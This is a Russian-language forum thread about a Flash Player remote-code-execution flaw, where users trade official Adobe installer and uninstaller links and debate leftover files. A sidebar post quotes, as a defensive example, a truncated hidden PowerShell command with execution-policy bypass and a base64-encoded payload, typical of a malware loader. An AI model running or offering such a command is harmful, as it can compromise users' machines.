Перейти к содержанию
AM_Bot

Обнаружена критическая уязвимость в Adobe Flash Player

Recommended Posts

AM_Bot

Обнаружена критическая уязвимость в Adobe Flash Player, которая позволяет удаленному пользователю выполнить произвольный код на целевой системе в контексте браузера. Уязвимости подвержены версии 9.0.115.0 и 9.0.124.0, возможно более ранние.

читать дальше

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Для устранения описанной уязвимости в Adobe Flash Player лучше всего использовать собственные средства Adobe.

Удалить-Установить!

Деинсталлятор Adobe Flash Player для всех версий:

http://download.macromedia.com/pub/flashpl...lash_player.exe

(Запуск деинсталлятора напрямую или посредством Run > cmd с ключом [ /clean])

***

Загрузка Adobe Flash Player 8:

Установщик самого плеера:

http://www.macromedia.com/software/flashpl...sh_player_8.msi

Установщик плагина для Internet Explorer 6,7:

http://www.macromedia.com/software/flashpl...er_8_plugin.msi

***

Загрузка Adobe Flash Player 9:

Установщик самого плеера:

http://fpdownload.macromedia.com/get/flash...lash_player.exe

Установщик плагина для Internet Explorer 6,7

[http://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_plugin.msi]

***

Загрузка Adobe Flash Player 10 Beta:

ActiveX-инсталлятор

[http://download.macromedia.com/pub/labs/flashplayer10/flashplayer10_install_activex_051508.exe]

Установщик плагина для Internet Explorer 6,7 (1,75 Мб):

[http://download.macromedia.com/pub/labs/flashplayer10/flashplayer10_install_plugin_051508.exe]

Зачёркнутое удалено с сайта производителя после появления новой 10-ки (см. пост ниже).

Изменения сделаны мною 23.10.2008 - Андрей-001.

Если кому-то будут нужны старые 9,10-ки - они у меня есть в архиве.

***

Фирменный инструмент от Adobe для отладки и конвертации файлов swf в exe и запуска их без установки Adobe Flash Player.

Увы, ссылка (нефирменная и не моя) только эта.

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Вышла новая 10-я версия (10.0.0.525) плагина для Internet Explorer (весит даже чуть меньше предыдущей - 1,73 Мб):

http://download.macromedia.com/pub/labs/fl...ugin_070208.exe

При установке плагина установщик сам удаляет предыдущую версию. Давно бы так.

AFP_rem.JPG

Добавлено позднее:

Актуальность ссылки на новую 10-ку подтверждаю. Качайте, устанавливайте.

23.10.2008

post-3999-1226872343_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

AFP.JPG

Ссылка на 9-ку из поста №2 теперь ведёт на официальную 10-ку:

Adobe® Flash® Player Plugin (версия 10.0.12.36) 1,76 Мб

http://fpdownload.macromedia.com/get/flash...lash_player.exe

Плагин для браузера, позволяющий проигрывать Flash-ролики (swf-файлы).

Без этой программы браузер будет некорректно отображать веб-страницы и интерактивные веб-элементы, разработанные по технологии Flash.

Поддерживаемые браузеры: Internet Explorer, Firefox, Netscape, Opera, Maxthon.

Пожалуйста, скачайте и установите новую версию.

Удаление старой производится в процессе установки.

AFP_ico.JPG

Так выглядит оригинальный файл от Adobe.

post-3999-1226609658.jpg

post-3999-1226872180.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
Удаление старой производится в процессе установки.

Фиг там! Проверено.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001
Фиг там! Проверено.

Во всяком случае так пишется во время установки

Inst_deinst_AFP.JPG

Активное окно при установке версии AFP 10.0.0.525 или 10.0.12.36

Inst_deinst_AFP_dir.JPG

Директория Macromedia после установки (тут нет старых версий файлов).

Если возникли сомнения, то используйте Деинсталлятор Adobe Flash Player:

Деинсталлятор Adobe Flash Player для всех версий:

http://download.macromedia.com/pub/flashpl...lash_player.exe

Deinst_AFP.JPG

Активное окно при работе Деинсталлятора (всё наглядно).

post-3999-1226348641_thumb.jpg

post-3999-1226349152_thumb.jpg

post-3999-1226349952_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Берем в руки KAV 2009 (тут смайлик) и запускаем поиск уязвимостей при установленной 9-ке. Находим несколько файлов. Ставим 10 и снова запускаем сканер - находим 2 файла из тех, что были раньше. Запускаем унисталлер, который можно скачать на сайте, затем ставим 10 и пробегаем сканером - уязвимостей нет.

Я еще не встречал НИ ОДНОЙ программки, инсталлятор которой корректно подчищает остатки прошлых версий.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001
Ставим 10 и снова запускаем сканер - находим 2 файла из тех, что были раньше.

Umnik Вы пропустили следующий ход: 2 файла из тех, что были раньше могут быть удалены только после перезагрузки (Delete on reboot). Из них один - Flashxx.ocx вообще нельзя удалять, т.к. он часть активных приложений ОСи.

Но, если есть желание, то проверьте, есть ли по версии KAV2009 уязвимости после удаления Деинсталлятором 9-ки и перезагрузки без установки новой версии, а также после удаления Деинсталлятором 10-ки и перезагрузки без установки новой версии.

Я еще не встречал НИ ОДНОЙ программки, инсталлятор которой корректно подчищает остатки прошлых версий.

Потому Adobe и позаботилась о Деинсталляторе. Все бы так. Какая жизнь тогда настала бы...

После переустановки Windows XP рекомендую сразу же ставить новейший IE7, потом Деинсталлятором удалять старые версии флеш-плеера и флеш-плагина, и ставить новую 10-ку. А также новую Яву.

А, может быть, пользователям IE7 пора задуматься об использовании IE8 см. эту тему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Андрей-001

Если это Вы меня обучаете основам, то не нужно. ;)

А что касается перепроверки - нет никакого желания, вот честно.

Потому Adobe и позаботилась о Деинсталляторе. Все бы так.

Не спорю совершенно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001
Если это Вы меня обучаете основам, то не нужно.

Нет, это не для Вас, это для

пользователям IE

********************************************************************

Традиционным спутником Adobe Flash Player является Adobe Shockwave Player.

Поэтому Adobe Systems Incorporated рекомендует установить и его.

Установка Adobe Shockwave Player версии 11.0.3.470 осуществляется со страницы

http://www.adobe.com/go/EN_US-H-GET-SHOCKWAVE

Необходимо разрешить установку элемента ActiveX от Adobe Systems Incorporated и дождаться окончания загрузки.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Вышла новая версия Adobe Flash Player v. 10.0.22.87

Страница загрузок: http://get.adobe.com/flashplayer/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
p2u

Гм... Заманчиво, но нет, спасибо... :D

Paul

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001
Заманичво, но нет, спасибо...

Это на тот случай, когда требуется оставить AFP, а не удалить, как мы с вами делаем. :)

Потому что на старой версии у пользователей опять стали вываливаться ошибки при открытии некоторых страниц и проситься на установку элементов. Я проверил - оказывается точно - вышла новая версия. Лучше и безопаснее уж загрузить отттуда, чем с какого-то стороннего сайта.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Adobe рекомендует пользователям Windows, Macintosh, Linux обновить Adobe Flash Player до версии 10.0.22.87.

Центр поддержки и загрузки Adobe Flash Player

http://www.adobe.com/support/flashplayer/downloads.html

Предыдущие исправленные версии для этих платформ тоже доступны для скачивания.

Архив всех ранее выпущенных полных версий Flash Player, начиная с версии 2, тоже стал общедоступным:

http://kb2.adobe.com/cps/142/tn_14266.html

Размеры полных версий увеличиваются от версии к версии.

Flash Player 10 (130 MB)

Flash Player 10 (debugger versions) (116 MB)

Flash Player 9 (226 MB)

Flash Player 9 (debugger versions) (205 MB)

Flash Player 8 (20.8 MB)

Flash Player 7 (37.8 MB)

Flash Player 6 (14.8 MB)

Flash Player 5 (2.1 MB)

Flash Player 4 (713 KB)

Flash Player 3 (975 KB)

Flash Player 2 (618 KB)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Black Angel

В Adobe Flash Player опять есть уязвимость. Исправлено патчем производителя, сейчас актуальная версия 10.0.45.2. Взять можно здесь

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Андрей-001
Исправлено патчем производителя, сейчас актуальная версия 10.0.45.2

ОК. Спасибо за новость. Обновил. И по моей ссылке выше качается актуальная версия.

Видимо, эту ссылку они используют для всех актуальных сборок. По крайней мере пока.

На некоторых ПК замечаю, что адрес на загрузку актуального файл прописывается в системе. Но у меня этого нет.

Возможно, файервол не позволяет... Другого объяснения пока нет. Есть другие соображения на этот счёт?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×